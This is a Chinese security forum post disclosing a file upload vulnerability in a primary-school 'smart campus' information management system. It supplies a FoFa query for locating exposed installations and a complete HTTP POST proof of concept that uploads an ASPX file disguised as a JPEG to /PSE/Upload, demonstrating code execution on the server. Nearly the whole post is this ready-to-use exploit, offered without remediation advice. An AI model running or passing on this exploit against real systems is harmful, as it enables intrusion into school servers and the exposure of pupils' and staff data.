小学智慧校园信息管理系统 Upload 文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

小学智慧校园信息管理系统 Upload 文件上传漏洞

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
90

FoFa语句:

body="/Login/IndexMobi"

image

 

POC:

POST /PSE/Upload HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: multipart/form-data; boundary=230982304982309
Connection: close
Content-Length: 239

--230982304982309
Content-Disposition: form-data; name="file"; filename="Hello.aspx"
Content-Type: image/jpg

<%@Page Language="C#"%><%Response.Write("HelloWorldTest");System.IO.File.Delete(Request.PhysicalPath);%>
--230982304982309--

4b607366e6118e41f9c03ea87e74d4cd

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面